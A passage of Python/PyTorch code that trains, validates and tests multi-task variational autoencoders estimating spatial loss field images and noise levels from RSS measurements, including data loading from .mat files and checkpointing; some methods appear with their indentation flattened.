        train_kl_loss_c += kl_loss_c.item()
        train_loss_task0 += loss_task0.item()
        train_loss_task1 += loss_task1.item()
        train_loss_task2 += loss_task2.item()
        train_loss_task3 += loss_task3.item()
        _, noise_pred = torch.max(noise_level, 1)
        acc_task3 = (noise_pred == target_noise_level).sum()
        train_acc += acc_task3.item()
        # backprop the per-sample MEAN loss (accumulators above keep the sum)
        loss /= input_RSS.size(0)
        loss.backward()
        optimizer.step()
        if batch_idx % self.args.log_interval == 0:
            print(
                'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
                    epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
                    100. * batch_idx / len(train_loader),
                    loss.item(),
                    KLD.item() / len(input_RSS),
                    loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
                    loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
            print(
                'Train Epoch: {} [{}/{} ({:.0f}%)]\tkld_w: {:.6f}\tkld_h: {:.6f}\tkld_c: {:.6f}'.format(
                    epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
                    100. * batch_idx / len(train_loader),
                    kl_loss_w.item() / len(input_RSS),
                    kl_loss_h.item() / len(input_RSS),
                    kl_loss_c.item() / len(input_RSS)))
    # convert accumulated sums to per-sample averages
    train_loss /= len(train_loader.dataset)
    train_kld /= len(train_loader.dataset)
    train_kl_loss_w /= len(train_loader.dataset)
    train_kl_loss_h /= len(train_loader.dataset)
    train_kl_loss_c /= len(train_loader.dataset)
    train_loss_task0 /= len(train_loader.dataset)
    train_loss_task1 /= len(train_loader.dataset)
    train_loss_task2 /= len(train_loader.dataset)
    train_loss_task3 /= len(train_loader.dataset)
    train_acc /= len(train_loader.dataset)
    print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
    print('====> KL divergence: {:.6f}'.format(train_kld))
    print('====> KLD_W: {:.6f}'.format(train_kl_loss_w))
    print('====> KLD_H: {:.6f}'.format(train_kl_loss_h))
    print('====> KLD_C: {:.6f}'.format(train_kl_loss_c))
    print('====> RSS loss: {:.6f}'.format(train_loss_task0))
    print('====> SLF loss: {:.6f}'.format(train_loss_task1))
    print('====> ab loss: {:.6f}'.format(train_loss_task2))
    print('====> noise level loss: {:.6f}'.format(train_loss_task3))
    print('====> noise level Accuracy: {:.4f}'.format(train_acc))
    return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c
def validate(self, model, val_loader, epoch):
    """Evaluate the model on the validation set.

    Computes the weighted task loss — with KLD deliberately excluded
    (weighted by zero) so model selection tracks the task losses only —
    plus the SLF reconstruction RMSE and MAE, all averaged per sample.

    Args:
        model: MGMVAE network; forward returns at least
            (KLD, RSS, SLF, ab, noise_level_logits, ...).
        val_loader: DataLoader yielding (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) tuples.
        epoch: kept for interface compatibility with train()/test(); unused
            here since the KLD warm-up weight does not apply (KLD weight 0).

    Returns:
        (val_loss, val_rmse_slf, val_mae_slf)
    """
    model.eval()
    val_loss = 0  # total loss
    val_rmse_slf = 0  # accumulated SLF squared error
    val_mae_slf = 0  # accumulated SLF absolute error
    # no_grad: validation never backpropagates. Mirrors self.test(); the
    # original kept the autograd graph alive here. The original also
    # computed an unused KLD warm-up weight (dead code) — removed.
    with torch.no_grad():
        for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            target_noise_level = target_noise_level.to(self.device)
            KLD, RSS, SLF, ab, noise_level, *_ = model(input_RSS)
            loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
                self.args.N * self.args.P * self.args.P)
            loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
            loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
            # KLD weighted by 0: excluded from the validation criterion
            loss = 0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
                + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
            val_loss += loss.item()
            slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            val_rmse_slf += slf_mse.item()
            val_mae_slf += slf_mae.item()
    val_loss /= len(val_loader.dataset)
    val_rmse_slf /= len(val_loader.dataset)
    val_rmse_slf = np.sqrt(val_rmse_slf)
    val_mae_slf /= len(val_loader.dataset)
    print('====> Validation set loss: {:.6f}'.format(val_loss))
    print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
    print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
    return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
model.eval()
test_loss = 0 # total loss
test_kld = 0 # KL-divergence
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
test_kl_loss_w = 0 # kl-divergence for w
test_kl_loss_h = 0 # kl-divergence for h
test_kl_loss_c = 0 # kl-divergence for c
batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_kld += KLD.item()
test_kl_loss_w += kl_loss_w.item()
test_kl_loss_h += kl_loss_h.item()
test_kl_loss_c += kl_loss_c.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_kld /= len(test_loader.dataset)
test_kl_loss_w /= len(test_loader.dataset)
test_kl_loss_h /= len(test_loader.dataset)
test_kl_loss_c /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set KL divergence: {:.6f}'.format(test_kld))
print('====> Test set KLD_W: {:.6f}'.format(test_kl_loss_w))
print('====> Test set KLD_H: {:.6f}'.format(test_kl_loss_h))
print('====> Test set KLD_C: {:.6f}'.format(test_kl_loss_c))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c
def train_save(self):
    """Full training driver for the MGMVAE.

    Trains for self.args.n_epochs epochs; each epoch runs train/validate and
    evaluates on the test set plus the two single-image test sets. Saves a
    periodic checkpoint every save_freq epochs, keeps the model with the
    lowest validation SLF MAE at model_path, and dumps all per-epoch metric
    curves to .npy/.npz files under self.path.
    """
    model = MGMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    def weights_init(m):
        # Xavier-uniform init for every linear / conv / deconv layer,
        # with zeroed biases
        if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):
            torch.nn.init.xavier_uniform_(m.weight.data)
            if m.bias is not None:
                torch.nn.init.zeros_(m.bias.data)
    model.apply(weights_init)
    model = model.to(self.device)
    summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
    train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
    optimizer = self.get_optimizer(model.parameters())
    # reduce LR when the validation loss plateaus
    scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
    train_set = []
    val_set = []
    test_set = []  # for test set
    test_set1 = []  # for test image 1
    test_set2 = []  # for test image 2
    train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
    val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
    test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    current_val_slf_loss = np.inf  # best (lowest) validation SLF MAE so far
    for epoch in range(1, self.args.n_epochs+1):
        print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
        train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c = self.train(
            model,
            train_loader,
            optimizer,
            epoch)
        train_set.append(
            [train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3,
             train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c])
        print('====> Validation Loss for Epoch {:d}'.format(epoch))
        val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
        val_set.append([val_loss, val_slf_rmse, val_slf_mae])
        scheduler.step(val_loss)
        print('====> Test for Epoch {:d}'.format(epoch))
        test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
            model,
            test_loader, epoch)
        test_set.append(
            [test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
             test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
        print('====> Test Image1 for Epoch {:d}'.format(epoch))
        test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
            model,
            test_loader1, epoch)
        test_set1.append(
            [test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
             test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
        print('====> Test Image2 for Epoch {:d}'.format(epoch))
        test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
            model,
            test_loader2, epoch)
        test_set2.append(
            [test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
             test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
        # periodic checkpoint
        if epoch % self.args.save_freq == 0:
            ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
            torch.save(model.state_dict(), ckpt_path)
            print('checkpoint{}.pth saved!'.format(epoch))
        # keep the best model (lowest validation SLF MAE) at model_path
        if val_slf_mae < current_val_slf_loss:
            torch.save(model.state_dict(), model_path)
            current_val_slf_loss = val_slf_mae
    # persist per-epoch metric curves (10 columns: 6 losses + acc + 3 KLD parts)
    train_loss = np.asarray(train_set).reshape(-1, 10)
    val_loss = np.asarray(val_set).reshape(-1, 3)
    test_loss = np.asarray(test_set).reshape(-1, 10)
    test_loss1 = np.asarray(test_set1).reshape(-1, 10)
    test_loss2 = np.asarray(test_set2).reshape(-1, 10)
    np.save(train_loss_path, train_loss)
    np.save(val_loss_path, val_loss)
    np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
    """Evaluate a trained MGMVAE checkpoint on the test set and two held-out images.

    Loads ``model_<n_epochs>.pth`` from ``self.path``, then for each of the
    three test loaders reports SLF RMSE/MAE, ab RMSE and noise-level accuracy,
    saving side-by-side target/reconstruction SLF images along the way.

    Args:
        noise_level: 'all', 'low', 'mid' or 'high'; forwarded to
            ``load_data`` to select the test subset.
    """
    model = MGMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    model = model.to(self.device)
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    model.load_state_dict(torch.load(model_path, map_location=self.device))
    model.eval()
    *_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
    # noise_class tags the saved image filenames (0 stands for all classes)
    noise_class = {'low': 1, 'mid': 2, 'high': 3}.get(noise_level, 0)

    def _evaluate(loader, img_tag, title):
        # Shared evaluation loop for one DataLoader; img_tag ('', '1', '2')
        # distinguishes the reconstruction image filenames and title labels
        # the per-loader report.
        slf_rmse = 0
        slf_mae = 0
        ab_rmse = 0
        with torch.no_grad():
            for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, _) in enumerate(loader):
                input_RSS = input_RSS.to(self.device)
                target_RSS = target_RSS.to(self.device)
                target_SLF = target_SLF.to(self.device)
                target_ab = target_ab.to(self.device)
                KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
                # save first up-to-8 targets stacked over their reconstructions
                n = min(target_RSS.size(0), 8)
                comparison = torch.cat(
                    [target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
                     SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
                save_image(comparison.cpu(),
                           self.path + 'reconstruction_SLF' + img_tag + '_noise'
                           + str(noise_class) + '_' + str(batch_idx) + '.png',
                           nrow=n)
                # accumulate per-element-normalised sums; divided by the
                # dataset size (then sqrt for RMSE) after the loop
                slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
                slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
                ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
        slf_rmse = np.sqrt(slf_rmse / len(loader.dataset))
        slf_mae /= len(loader.dataset)
        ab_rmse = np.sqrt(ab_rmse / len(loader.dataset))
        noise_acc = self.test_accuracy(model, loader)
        print('====> Test for ' + title + ':')
        print('====> Noise_level: ' + noise_level)
        print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
        print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
        print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
        print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))

    _evaluate(test_loader, '', 'Testing Set')
    _evaluate(test_loader1, '1', 'image 1')
    _evaluate(test_loader2, '2', 'image 2')
# runner for Multi-task Laplacian Mixture VAE
class MLMVAE_runner():
def __init__(self, args):
    """Set up device, RNG seeds and the output directory for this runner.

    Args:
        args: parsed CLI namespace; uses ``no_cuda``, ``seed`` and ``run``
            (base output directory) here.
    """
    self.args = args
    # prefer CUDA unless disabled by flag or unavailable
    use_cuda = torch.cuda.is_available() and not self.args.no_cuda
    self.device = torch.device("cuda" if use_cuda else "cpu")
    # seed both torch and python RNGs for reproducibility
    torch.manual_seed(self.args.seed)
    random.seed(self.args.seed)
    # all checkpoints / losses / images go under <run>/MLMVAE/
    self.path = self.args.run + 'MLMVAE/'
    os.makedirs(self.path, exist_ok=True)
def get_optimizer(self, parameters):
    """Build the optimizer named by ``self.args.optimizer``.

    Args:
        parameters: iterable of model parameters to optimize.

    Returns:
        A configured ``torch.optim`` optimizer.

    Raises:
        NotImplementedError: if the optimizer name is not one of
            'Adam', 'RMSProp' or 'SGD'.
    """
    choice = self.args.optimizer
    if choice == 'Adam':
        return optim.Adam(parameters, lr=self.args.lr,
                          weight_decay=self.args.weight_decay,
                          betas=(0.9, 0.999), eps=1e-7)
    if choice == 'RMSProp':
        return optim.RMSprop(parameters, lr=self.args.lr,
                             weight_decay=self.args.weight_decay)
    if choice == 'SGD':
        return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
    raise NotImplementedError('Optimizer {} not understood.'.format(choice))
def load_data(self, noise_level='all'):
    """Build the train/val/test DataLoaders.

    Args:
        noise_level: 'all', 'low', 'mid' or 'high'; forwarded to the
            test-set loaders to select the noise subset.

    Returns:
        (train_loader, val_loader, test_loader, test_loader1, test_loader2)
    """
    dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
    # 90/10 split. Take the remainder for validation so the two lengths
    # always sum to len(dataset): int(len*0.9) + int(len*0.1) can fall one
    # short for non-divisible sizes, which makes random_split raise.
    train_size = int(len(dataset) * 0.9)
    val_size = len(dataset) - train_size
    dataset_train, dataset_val = random_split(
        dataset, [train_size, val_size],
        generator=torch.Generator().manual_seed(self.args.seed))
    # test data is normalised with the training-set bounds
    dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    # shuffle only the training/validation streams; keep test order fixed
    train_loader = DataLoader(
        dataset_train,
        batch_size=self.args.batch_size, shuffle=True, num_workers=2)
    val_loader = DataLoader(
        dataset_val,
        batch_size=self.args.batch_size, shuffle=True, num_workers=2)
    test_loader = DataLoader(
        dataset_test,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    test_loader1 = DataLoader(
        dataset_test1,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    test_loader2 = DataLoader(
        dataset_test2,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    print("Data Loaded!")
    return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
    """Read ./data/training_data.mat and assemble the training dataset.

    Returns:
        (Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min)
        where the max/min arrays are the per-feature min-max bounds, kept
        so the test data can be normalised with the same scaling.
    """
    mat = sio.loadmat('./data/training_data.mat')
    # Noisy RSS input [num_sample, N*P*P]: min-max normalise per feature,
    # then reshape to image-like [num_sample, N, P, P].
    noisy = mat['RSS']
    RSS_max = np.amax(noisy, axis=0, keepdims=True)
    RSS_min = np.amin(noisy, axis=0, keepdims=True)
    noisy = (noisy - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS (decoder target): same treatment with its own bounds.
    clean = mat['RSS_denoise']
    RSS_denoise_max = np.amax(clean, axis=0, keepdims=True)
    RSS_denoise_min = np.amin(clean, axis=0, keepdims=True)
    clean = (clean - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image flattened to [num_sample, K0*K1].
    slf = mat['slf_img'].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm = [b_norm, alpha_norm] (bias / path-loss exponent),
    # shape [num_sample, N+1].
    ab = mat['ab_norm']
    # Noise-level class labels (0, 1 or 2), squeezed from [num_sample, 1].
    noise = np.squeeze(mat['sig_epsilon_class'])
    Train_Dataset = TensorDataset(torch.from_numpy(noisy).float(),
                                  torch.from_numpy(clean).float(),
                                  torch.from_numpy(slf).float(),
                                  torch.from_numpy(ab).float(),
                                  torch.from_numpy(noise).long())
    return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Read ./data/testing_data.mat, filtered to the requested noise level.

    The normalisation bounds computed on the training set are reused so
    train and test share the same scaling.

    Raises:
        NotImplementedError: for an unrecognised ``noise_level``.
    """
    mat = sio.loadmat('./data/testing_data.mat')
    # noise level classes (0, 1 or 2), squeezed from [num_sample, 1]
    classes = np.squeeze(mat['sig_epsilon_class'])
    if noise_level == 'all':
        idx = (classes == 0) | (classes == 1) | (classes == 2)
    elif noise_level == 'low':
        idx = (classes == 0)
    elif noise_level == 'mid':
        idx = (classes == 1)
    elif noise_level == 'high':
        idx = (classes == 2)
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    classes = classes[idx]
    # Noisy RSS input, min-max normalised with the training bounds,
    # reshaped to [num_sample, N, P, P].
    noisy = (mat['RSS'][idx] - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS decoder target, same treatment.
    clean = (mat['RSS_denoise'][idx] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image target flattened to [num_sample, K0*K1].
    slf = mat['slf_img'][idx].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm = [b_norm, alpha_norm], shape [num_sample, N+1].
    ab = mat['ab_norm'][idx]
    return TensorDataset(torch.from_numpy(noisy).float(),
                         torch.from_numpy(clean).float(),
                         torch.from_numpy(slf).float(),
                         torch.from_numpy(ab).float(),
                         torch.from_numpy(classes).long())
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data_image1.mat: many noisy samples of one SLF image.

    The single ground-truth SLF image is tiled across all samples so each
    sample carries its own copy of the target.

    Args:
        RSS_max, RSS_min: training-set bounds for normalising the noisy RSS.
        RSS_denoise_max, RSS_denoise_min: bounds for the clean RSS target.
        noise_level: 'all', 'low', 'mid' or 'high'; anything else raises
            NotImplementedError.

    Returns:
        TensorDataset of (input_RSS, denoise_RSS, slf_img, ab, noise_level).
    """
    # Load testing data for image 1
    testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
    # normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
    test_input_RSS1 = testing_data1['RSS']
    test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
    test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
    # normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
    test_denoise_RSS1 = testing_data1['RSS_denoise']
    test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
    # single ground-truth SLF image (shape: [1, K0*K1]) ...
    test_slf_img1 = testing_data1['slf_img']
    test_slf_img1 = test_slf_img1.reshape(1, self.args.K0 * self.args.K1)
    # ... tiled so every sample shares the same SLF target (shape: [num_sample, K0*K1])
    test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
    # b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
    test_ab1 = testing_data1['ab_norm']
    # noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
    test_noise_level1 = testing_data1['sig_epsilon_class']
    test_noise_level1 = np.squeeze(test_noise_level1)
    # Subset selection below assumes samples are stored in three 500-sample
    # blocks ordered low / mid / high -- NOTE(review): confirm against the
    # .mat generation script.
    if noise_level == 'all':
        pass
    elif noise_level == 'low':
        test_input_RSS1 = test_input_RSS1[:500]
        test_denoise_RSS1 = test_denoise_RSS1[:500]
        test_slf_img1 = test_slf_img1[:500]
        test_ab1 = test_ab1[:500]
        test_noise_level1 = test_noise_level1[:500]
    elif noise_level == 'mid':
        test_input_RSS1 = test_input_RSS1[500:1000]
        test_denoise_RSS1 = test_denoise_RSS1[500:1000]
        test_slf_img1 = test_slf_img1[500:1000]
        test_ab1 = test_ab1[500:1000]
        test_noise_level1 = test_noise_level1[500:1000]
    elif noise_level == 'high':
        test_input_RSS1 = test_input_RSS1[1000:]
        test_denoise_RSS1 = test_denoise_RSS1[1000:]
        test_slf_img1 = test_slf_img1[1000:]
        test_ab1 = test_ab1[1000:]
        test_noise_level1 = test_noise_level1[1000:]
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    # convert to the tensor dtypes the model and losses expect
    test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
    test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
    test_slf_img1 = torch.from_numpy(test_slf_img1).float()
    test_ab1 = torch.from_numpy(test_ab1).float()
    test_noise_level1 = torch.from_numpy(test_noise_level1).long()
    Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
    return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data_image2.mat: many noisy samples of one SLF image.

    Mirrors ``load_testing_img1`` for the second held-out image.

    Args:
        RSS_max, RSS_min: training-set bounds for normalising the noisy RSS.
        RSS_denoise_max, RSS_denoise_min: bounds for the clean RSS target.
        noise_level: 'all', 'low', 'mid' or 'high'; anything else raises
            NotImplementedError.

    Returns:
        TensorDataset of (input_RSS, denoise_RSS, slf_img, ab, noise_level).
    """
    # Load testing data for image 2
    testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
    # normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
    test_input_RSS2 = testing_data2['RSS']
    test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
    test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
    # normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
    # NOTE(review): this file uses key 'RSS_denoise_norm' whereas image 1
    # uses 'RSS_denoise' -- confirm the key difference is intentional in the
    # .mat generation script.
    test_denoise_RSS2 = testing_data2['RSS_denoise_norm']
    test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
    # single ground-truth SLF image (shape: [1, K0*K1]) ...
    test_slf_img2 = testing_data2['slf_img']
    test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
    # ... tiled so every sample shares the same SLF target (shape: [num_sample, K0*K1])
    test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
    # b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
    test_ab2 = testing_data2['ab_norm']
    # noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
    test_noise_level2 = testing_data2['sig_epsilon_class']
    test_noise_level2 = np.squeeze(test_noise_level2)
    # Subset selection below assumes samples are stored in three 500-sample
    # blocks ordered low / mid / high -- NOTE(review): confirm against the
    # .mat generation script.
    if noise_level == 'all':
        pass
    elif noise_level == 'low':
        test_input_RSS2 = test_input_RSS2[:500]
        test_denoise_RSS2 = test_denoise_RSS2[:500]
        test_slf_img2 = test_slf_img2[:500]
        test_ab2 = test_ab2[:500]
        test_noise_level2 = test_noise_level2[:500]
    elif noise_level == 'mid':
        test_input_RSS2 = test_input_RSS2[500:1000]
        test_denoise_RSS2 = test_denoise_RSS2[500:1000]
        test_slf_img2 = test_slf_img2[500:1000]
        test_ab2 = test_ab2[500:1000]
        test_noise_level2 = test_noise_level2[500:1000]
    elif noise_level == 'high':
        test_input_RSS2 = test_input_RSS2[1000:]
        test_denoise_RSS2 = test_denoise_RSS2[1000:]
        test_slf_img2 = test_slf_img2[1000:]
        test_ab2 = test_ab2[1000:]
        test_noise_level2 = test_noise_level2[1000:]
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    # convert to the tensor dtypes the model and losses expect
    test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
    test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
    test_slf_img2 = torch.from_numpy(test_slf_img2).float()
    test_ab2 = torch.from_numpy(test_ab2).float()
    test_noise_level2 = torch.from_numpy(test_noise_level2).long()
